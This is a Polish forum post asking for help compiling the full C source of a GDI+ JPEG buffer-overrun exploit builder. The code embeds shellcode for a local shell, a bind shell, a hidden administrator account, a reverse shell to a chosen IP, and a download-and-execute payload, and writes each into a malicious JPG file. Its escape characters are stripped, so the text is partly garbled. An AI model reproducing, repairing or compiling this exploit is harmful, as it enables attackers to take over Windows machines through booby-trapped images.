Moglby mi ktos pomoc przy kompilowaniu tego :
Kod:
#include <direct.h>
#include <windows.h>
#include <winbase.h>
#include <winnls.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+235+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+221+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+228+16)) = (port)
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//pop up cmd.exe
char shellcode1[]=
"x68" // push
"cmd "
"x8BxC4" // mov eax,esp
"x50" // push eax
"xB8x44x80xC2x77" // mov eax,77c28044h (address of system() on WinXP SP1)
"xFFxD0"; // call eax
//bind cmd.exe on a [port] defined by user
unsigned char shellcode2[] =
"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"
"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"
"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"
"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"
"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"
"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"
"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x8e"
"x4ex0execxffxd6x89xc7x81xecx00x01x00x00x57x56x53"
"x89xe5xe8x27x00x00x00x90x01x00x00xb6x19x18xe7xa4"
"x19x70xe9xe5x49x86x49xa4x1ax70xc7xa4xadx2exe9xd9"
"x09xf5xadxcbxedxfcx3bx57x53x32x5fx33x32x00x5bx8d"
"x4bx20x51xffxd7x89xdfx89xc3x8dx75x14x6ax07x59x51"
"x53xffx34x8fxffx55x04x59x89x04x8exe2xf2x2bx27x54"
"xffx37xffx55x30x31xc0x50x50x50x50x40x50x40x50xff"
"x55x2cx89xc7x31xdbx53x53x68x02x00x22x11x89xe0x6a"
"x10x50x57xffx55x24x53x57xffx55x28x53x54x57xffx55"
"x20x89xc7x68x43x4dx44x00x89xe3x87xfax31xc0x8dx7c"
"x24xacx6ax15x59xf3xabx87xfax83xecx54xc6x44x24x10"
"x44x66xc7x44x24x3cx01x01x89x7cx24x48x89x7cx24x4c"
"x89x7cx24x50x8dx44x24x10x54x50x51x51x51x41x51x49"
"x51x51x53x51xffx75x00x68x72xfexb3x16xffx55x04xff"
"xd0x89xe6xffx75x00x68xadxd9x05xcexffx55x04x89xc3"
"x6axffxffx36xffxd3xffx75x00x68x7exd8xe2x73xffx55"
"x04x31xdbx53xffxd0";
//It will create a new user account with the username="ASP32.NET"
// and password of "ASP" and add it to the local group "Administrators"
char shellcode3[]=
"xfcxe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45"
"x3cx8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3"
"x32x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74"
"x07xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5a"
"x24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01"
"xe8xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59"
"x64x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68"
"x8ex4ex0execxffxd6x89xc7xebx18x53x68x98xfex8ax0e"
"xffxd6xffxd0x53x68xefxcexe0x60xffxd6x6ax00xffxd0"
"xffxd0x6ax00xe8xe1xffxffxffx63x6dx64x2ex65x78x65"
"x20x2fx63x20x6ex65x74x20x75x73x65x72x20x41x53x50"
"x33x32x2ex4ex45x54x20x41x53x50x20x2fx41x44x44x20"
"x26x26x20x6ex65x74x20x6cx6fx63x61x6cx67x72x6fx75"
"x70x20x41x64x6dx69x6ex69x73x74x72x61x74x6fx72x73"
"x20x41x53x50x33x32x2ex4ex45x54x20x2fx41x44x44x00";
//connect back to a user defined [ip] and [port]
unsigned char shellcode4[] =
"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"
"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"
"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"
"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"
"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"
"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"
"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x8e"
"x4ex0execxffxd6x89xc7x81xecx00x01x00x00x57x56x53"
"x89xe5xe8x1fx00x00x00x90x01x00x00xb6x19x18xe7xa4"
"x19x70xe9xecxf9xaax60xd9x09xf5xadxcbxedxfcx3bx57"
"x53x32x5fx33x32x00x5bx8dx4bx18x51xffxd7x89xdfx89"
"xc3x8dx75x14x6ax05x59x51x53xffx34x8fxffx55x04x59"
"x89x04x8exe2xf2x2bx27x54xffx37xffx55x28x31xc0x50"
"x50x50x50x40x50x40x50xffx55x24x89xc7x68x7fx00x00"
"x01x68x02x00x22x11x89xe1x6ax10x51x57xffx55x20x59"
"x59x68x43x4dx44x00x89xe3x87xfax31xc0x8dx7cx24xac"
"x6ax15x59xf3xabx87xfax83xecx54xc6x44x24x10x44x66"
"xc7x44x24x3cx01x01x89x7cx24x48x89x7cx24x4cx89x7c"
"x24x50x8dx44x24x10x54x50x51x51x51x41x51x49x51x51"
"x53x51xffx75x00x68x72xfexb3x16xffx55x04xffxd0x89"
"xe6xffx75x00x68xadxd9x05xcexffx55x04x89xc3x6axff"
"xffx36xffxd3xffx75x00x68x7exd8xe2x73xffx55x04x31"
"xdbx53xffxd0";
//donwload from http
char shellcode5[]=
"xEBx0Fx58x80x30x17x40x81x38x6Dx30x30x21x75xF4"
"xEBx05xE8xECxFFxFFxFFxFEx94x16x17x17x4Ax42x26"
"xCCx73x9Cx14x57x84x9Cx54xE8x57x62xEEx9Cx44x14"
"x71x26xC5x71xAFx17x07x71x96x2Dx5Ax4Dx63x10x3E"
"xD5xFExE5xE8xE8xE8x9ExC4x9Cx6Dx2Bx16xC0x14x48"
"x6Fx9Cx5Cx0Fx9Cx64x37x9Cx6Cx33x16xC1x16xC0xEB"
"xBAx16xC7x81x90xEAx46x26xDEx97xD6x18xE4xB1x65"
"x1Dx81x4Ex90xEAx63x05x50x50xF5xF1xA9x18x17x17"
"x17x3ExD9x3ExE0xFExFFxE8xE8xE8x26xD7x71x9Cx10"
"xD6xF7x15x9Cx64x0Bx16xC1x16xD1xBAx16xC7x9ExD1"
"x9ExC0x4Ax9Ax92xB7x17x17x17x57x97x2Fx16x62xED"
"xD1x17x17x9Ax92x0Bx17x17x17x47x40xE8xC1x7Fx13"
"x17x17x17x7Fx17x07x17x17x7Fx68x81x8Fx17x7Fx17"
"x17x17x17xE8xC7x9Ex92x9Ax17x17x17x9Ax92x18x17"
"x17x17x47x40xE8xC1x40x9Ax9Ax42x17x17x17x46xE8"
"xC7x9ExD0x9Ax92x4Ax17x17x17x47x40xE8xC1x26xDE"
"x46x46x46x46x46xE8xC7x9ExD4x9Ax92x7Cx17x17x17"
"x47x40xE8xC1x26xDEx46x46x46x46x9Ax82xB6x17x17"
"x17x45x44xE8xC7x9ExD4x9Ax92x6Bx17x17x17x47x40"
"xE8xC1x9Ax9Ax86x17x17x17x46x7Fx68x81x8Fx17xE8"
"xA2x9Ax17x17x17x44xE8xC7x48x9Ax92x3Ex17x17x17"
"x47x40xE8xC1x7Fx17x17x17x17x9Ax8Ax82x17x17x17"
"x44xE8xC7x9ExD4x9Ax92x26x17x17x17x47x40xE8xC1"
"xE8xA2x86x17x17x17xE8xA2x9Ax17x17x17x44xE8xC7"
"x9Ax92x2Ex17x17x17x47x40xE8xC1x44xE8xC7x9Ax92"
"x56x17x17x17x47x40xE8xC1x7Fx12x17x17x17x9Ax9A"
"x82x17x17x17x46xE8xC7x9Ax92x5Ex17x17x17x47x40"
"xE8xC1x7Fx17x17x17x17xE8xC7xFFx6FxE9xE8xE8x50"
"x72x63x47x65x78x74x56x73x73x65x72x64x64x17x5B"
"x78x76x73x5Bx7Ex75x65x76x65x6Ex56x17x41x7Ex65"
"x63x62x76x7Bx56x7Bx7Bx78x74x17x48x7Bx74x65x72"
"x76x63x17x48x7Bx60x65x7Ex63x72x17x48x7Bx74x7B"
"x78x64x72x17x40x7Ex79x52x6Fx72x74x17x52x6Fx7E"
"x63x47x65x78x74x72x64x64x17x40x7Ex79x5Ex79x72"
"x63x17x5Ex79x63x72x65x79x72x63x58x67x72x79x56"
"x17x5Ex79x63x72x65x79x72x63x58x67x72x79x42x65"
"x7Bx56x17x5Ex79x63x72x65x79x72x63x45x72x76x73"
"x51x7Ex7Bx72x17x17x17x17x17x17x17x17x17x7Ax27"
"x27x39x72x6Fx72x17"
"m00!";
//add other shellcodes that you need here :)
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
char header1[]=
"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64"
"x00x64x00x00xFFxECx00x11x44x75x63x6Bx79x00x01x00"
"x04x00x00x00x0Ax00x00xFFxEEx00x0Ex41x64x6Fx62x65"
"x00x64xC0x00x00x00x01xFFxFEx00x01x00x14x10x10x19"
"x12x19x27x17x17x27x32xEBx0Fx26x32xDCxB1xE7x70x26"
"x2Ex3Ex35x35x35x35x35x3E";
char setNOPs1[]=
"xE8x00x00x00x00x5Bx8Dx8B"
"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";
char setNOPs2[]=
"x3ExE8x00x00x00x00x5Bx8Dx8B"
"x2Fx00x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";
char header2[]=
"x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x01x15x19x19"
"x20x1Cx20x26x18x18x26x36x26x20x26x36x44x36x2Bx2B"
"x36x44x44x44x42x35x42x44x44x44x44x44x44x44x44x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x44xFFxC0x00"
"x11x08x03x59x02x2Bx03x01x22x00x02x11x01x03x11x01"
"xFFxC4x00xA2x00x00x02x03x01x01x00x00x00x00x00x00"
"x00x00x00x00x00x03x04x01x02x05x00x06x01x01x01x01"
"x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x02"
"x03x10x00x02x01x02x04x05x02x03x06x04x05x02x06x01"
"x05x01x01x02x03x00x11x21x31x12x04x41x51x22x13x05"
"x61x32x71x81x42x91xA1xC1x52x23x14xB1xD1x62x15xF0"
"xE1x72x33x06x82x24xF1x92x43x53x34x16xA2xD2x63x83"
"x44x54x25x11x00x02x01x03x02x04x03x08x03x00x02x03"
"x01x00x00x00x00x01x11x21x31x02x41x12xF0x51x61x71"
"x81x91xA1xB1xD1xE1xF1x22x32x42x52xC1x62x13x72x92"
"xD2x03x23x82xFFxDAx00x0Cx03x01x00x02x11x03x11x00"
"x3Fx00x0Fx90xFFx00xBCxDAxB3x36x12xC3xD4xADxC6xDC"
"x45x2FxB2x97xB8x9DxCBx63xFDx26xD4xC6xD7x70xA4x19"
"x24x50xCAx46x2BxFCxEBx3BxC7xC9xA5x4Ax8Fx69x26xDF"
"x6Dx72x4Ax9Ex27x6Bx3ExE6x92x86x24x85x04xDBxEDxA9"
"x64x8Ex6Bx63x67x19x1AxA5xE7xB8x28x3Dx09xABx5Dx5F"
"x16xF7x8CxEDx49x4CxF5x01xE6xE5xD5x1Cx49xABx10x71"
"xA6x36x9Bx93x24x61x00x0Fx61xECx34xA7x9Cx23xF4x96"
"xC6xE6xAFxB7x80x76xEFx93xF0xAAx28x8Ax6BxE0x18xC0"
"xA4x9Bx7Ex90x39x03xC2x90xDCx43x31x91x62x91x86x23"
"x35x35xA2x80x4DxFAx72x31x07x9Dx03x70xA8x93x24x4F"
"x89x51x83x5ExA4x2Ex7AxC0x7DxA9x8Ax10x61x64x07xFA"
"x88xC6x89x26xDAx0Fx20xBDxB9x16xD2xA8xE8x91x3Fx1A"
"xE2xBAxF0xBEx74xABx1DxC4x44x15x1Ax8Ax9CxC7x2Ax6B"
"xA3x33xB7x1Ex88x47x69xA9x64x68x26xC1x97x0BxD6x86"
"x8Bx1Bx29xC6x87xE4xC7xFDxCCx53x11xA5x9Cx62x6AxE5"
"x40x37x61x89xF6xB2x9Cx2Ax7CxFDx05x6Ax30x5Fx52x02"
"xEBx72xBFx7Dx74x4Cx23xB9x8FxD8x78x67x54x59x64x47"
"xC5x75x21x18xD5xE3x58xE1x72x63xBFx6DxBDxCBxCAx82"
"x65xE7xDBx09x54x4Fx0Dx95x86x76xE3xF2xA0x48x82x55"
"xD7xA6xCExA7xAAxDCx6AxF1xA9x8ExE0x35xC1xCAxA1xD4"
"x93xD2xD6x39x95x3Cx6Bx46x60xACxC1x3Bx60xC9x70x84"
"x8ExA1x9Ax9Ax20x01x94xCAx08x91x53xDCx01xB1xB5x12"
"x37x11xC6xC1xACxF1x11xD4x9Cx6Bx3Ex69x76xF0x1Dx7B"
"x52x6DxC9xA8x66x94xBBx79x8Fx7ExDEx17xFDx4DxABx1E"
"x76x7AxA3x2BxE2x50x06xB7x2CxEBx2Ax49xC9xEAx4Ex9B"
"xE7xCAxAFx1ExECx23xDCx8BxE1x6Bx5Fx1Ax9BxE8x49x2E"
"x63xE5x03x32xCDx19xB8x23x10x78x1Fx85x5Cx15x8Cx97"
"x84x9BxDBx15x35x9Fx16xE0x1Ex86xB9x8Fx97x11x4ExDA"
"x35x02x45x25x93xF8x55x24x17xB9x1BxF5xC8x07xA9xE2"
"x2Ax76xB0xC2x37x01x95xADx81xB6x1Cx6AxA2x38xD9xAE"
"xCAx59x18x75x25xFFx00x81xAExD8xE8xBBx47x62xACxB7"
"xB6xA1x8Dx40xE3x86x65x6Dx1ExDBx89x2Fx9DxCDx6Bx24"
"x62x41x61x89xACx2Dx8Bx3ExB6x68xC0x63x73x70x6Bx6B"
"x6AxA1x7AxACx56xE7x11x56x58xD4x13xA4x0BxB6xEBxB3"
"x3Bx47x22x95xD3x53x2ExEAx19x86x96xF7x03x83x52x9E"
"x54xABx6Ex58x63x7Cx33xCEx93xB1x19x1CxE9xDBxAAx35"
"xBFx46x8DxD4xD2x56xE0xE0x33xA1x4Dx0Ax4Ex3BxB1xCD"
"xD4x06x44x56x4AxCDx24x26xEAx6Dx7Ax87xDCx3Bx60x6D"
"xFCx2Ax86x1Bx97x36x6Dx42x04xA0x11xEExE7x46x22x35"
"xD5x26xB0x1Cx0Bx7Cx69x5Fx06xECx5AxC5x0Bx46x70x27"
"xF2xD4x79xADx89xDAx30x74xBDx98xE4x68x58x86xE4x1B"
"x69xB9xDCx2Bx30x87x48x53xC5x85x3BxDDx8Ax4ExB5x42"
"xB2x8Cx6Ex2Cx01xF8x56x04x7BxC9xA3x05x4FxB4xD5xA2"
"xDFxF6xFDxC6xE2xA7x3Cx89x24xFExA9x5ExC3xD4x6DxF7"
"x85xC9x59x39x63x59x9BxFFx00x06x1Ax5ExFAx69x0Ax46"
"x2BxC0x9FxC2x91x8BxC9x40x58x16xBDxF2xC0xD3x3Bx7F"
"x2DxA9xBBx2Ex49x42x6Dx52x70x39x62x9Fx08x73x6Fx20"
"x09x64x00x01x83x2Bx00xD5x97xBCxDCxF6x9CxA7x66xEA"
"xD9xB6x9FxE1x56xDExBAxECx65xB4x44xD8xE3x8Dx52x2F"
"x36xCEx74x33x7Ex9Fx2Ex22x99x8BxC9x6Dx5Ax6Dx9ExA8"
"x22xC7x0CxA8x62x3Dx17x1Dx2FxC8xFAxD4xB0x9Ex14x45"
"x45xD5x6Ex96x04xE1xF1xA0x37x90x5BxD8x7Fx81x57x1B"
"xC8xD5x48x27x0Ex3Cx6Bx3DxCDx44x15x92x41x25x94x82"
"xAEx0Ex42x97x8Dx8Cx6DxAEx56xB8x26xD8x0FxE3x43x93"
"x73x18x75x28xD7xF8xD5xFFx00x74xE4x18xC2x82xACx6F"
"x86x7Fx2Ax4CxBExE5xFCxD2x22xCCx9Ax32xD1x7Cx7Dx68"
;
void show()
{
printf("_____________________________________________________________________nn");
printf(" .:[Sacred Desciples of Doom]:. n");
printf(" GDI+ buffer overrun Exploit, Modified by Crypto <[email protected]> n");
printf(" Greets to FoToZ who found the bug n");
printf(" These Exploit will build malicious JPG File nn");
printf("_____________________________________________________________________nn");
}
void show_usage(char s[255])
{
printf("_____________________________________________________________________nn");
printf(" .:[Sacred Desciples of Doom]:. n");
printf(" GDI+ buffer overrun Exploit, Modified by Crypto <[email protected]> n");
printf(" Greets to FoToZ who found the bug n");
printf(" These Exploit will build malicious JPG File nn");
printf("_____________________________________________________________________nn");
printf(" Usage: n");
printf("t%s 1: For lounching a local cmd.exe (not bound to the net)n",s);
printf("t%s 2 [port]: For lounching cmd.exe on defined [port]n",s);
printf("t%s 3: For creating a new user accountn",s);
printf("twith the username="ASP32.NET"n");
printf("tand password="ASP"and add it to the local group "Administrators"n");
printf("t%s 4 [ip] [port]: For making a conection to a defined [ip]n",s);
printf("tand on defined [port] and bind cmd.exe on itn");
printf("t%s 5 [http]: For downloading and then executing a filen",s);
exit(1);
}
int main(int argc, char *argv[])
{
FILE *fout;
unsigned int i=0,j=0;
unsigned short port=31337;
unsigned long ip;
WSADATA wsa;
if (argc < 2) { printf("%d",sizeof(shellcode5));
show_usage(argv[0]);
exit(1);
}
//pop up cmd.exe
if (atoi(argv[1]) == 1)
{
show();
mkdir("Crypto");
fout=fopen("CryptoCrypto1.jpg","wb");
if( !fout ) {
printf("ttErorr:Opening File ...n");
exit(1);
}
for(i=0;i<sizeof(shellcode1)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode1[i] )
printf("ttWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODEn");
printf("ttShellcode Size is %u bytesn", sizeof(shellcode1)-1);
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);
for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode1[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);
fprintf(fout,"xFFxD9");
printf("ttOk, Malicious JPG File Created ...nn");
fcloseall();
}
//bind cmd.exe on a [port]
if ((atoi(argv[1]) == 2))
{
show();
mkdir("Crypto");
fout=fopen("CryptoCrypto2.jpg","wb");
if( !fout ) {
printf("ttErorr:Opening File ...n");
exit(1);
}
// lets initialize the socket library, couse we use htons function
if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {
printf("We got a problem ... Winsock didn't initialize!!n");
exit(1);
}
port = atoi(argv[2]);
SET_PORTBIND_PORT(shellcode2, htons(port));
for(i=0;i<sizeof(shellcode2)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode2[i] )
printf("ttWarning: Shellcode Contains FFh D9h, Fix Shellcoden");
printf("ttShellcode Size is %u bytesn", sizeof(shellcode2)-1);
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);
for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode2[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);
fprintf(fout,"xFFxD9");
printf("ttOk, Malicious JPG File Created ...nn");
fcloseall();
WSACleanup();
}
//Create User "ASP32.NET"
if (atoi(argv[1]) == 3)
{
show();
mkdir("Crypto");
fout=fopen("CryptoCrypto3.jpg","wb");
if( !fout ) {
printf("ttErorr:Opening File ...n");
exit(1);
}
for(i=0;i<sizeof(shellcode3)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode3[i] )
printf("ttWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODEn");
printf("ttShellcode Size is %u bytesn", sizeof(shellcode3)-1);
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);
for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode3[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);
fprintf(fout,"xFFxD9");
printf("ttOk, Malicious JPG File Created ...nn");
fcloseall();
}
//reverse connect back
if (atoi(argv[1]) == 4)
{
show();
mkdir("Crypto");
fout=fopen("CryptoCrypto2.jpg","wb");
if( !fout ) {
printf("ttErorr:Opening File ...n");
exit(1);
}
// let's initialize the socket library, couse we use htons function
if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {
printf("We got a problem ... Winsock didn't initialize!!n");
exit(1);
}
ip = inet_addr(argv[2]);
port = atoi(argv[3]);
SET_CONNECTBACK_IP(shellcode4, ip);
SET_CONNECTBACK_PORT(shellcode4, htons(port));
for(i=0;i<sizeof(shellcode4)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode4[i] )
printf("ttWarning: Shellcode Contains FFh D9h, Fix Shellcoden");
printf("ttShellcode Size is %u bytesn", sizeof(shellcode4)-1);
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);
for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode4[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);
fprintf(fout,"xFFxD9");
printf("ttOk, Malicious JPG File Created ...nn");
fcloseall();
WSACleanup();
}
if (atoi(argv[1]) == 5)
{
show();
mkdir("Crypto");
fout=fopen("CryptoCrypto5.jpg","wb");
if( !fout ) {
printf("ttErorr:Opening File ...n");
exit(1);
}
strcat(shellcode5,argv[2]);
strcat(shellcode5,"x01");
for(i=0;i<sizeof(shellcode5)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode5[i] )
printf("ttWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODEn");
printf("ttShellcode Size is %u bytesn", sizeof(shellcode5)-1);
j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);
for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode5[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);
fprintf(fout,"xFFxD9");
printf("ttOk, Malicious JPG File Created ...nn");
fcloseall();
}
return 0;
}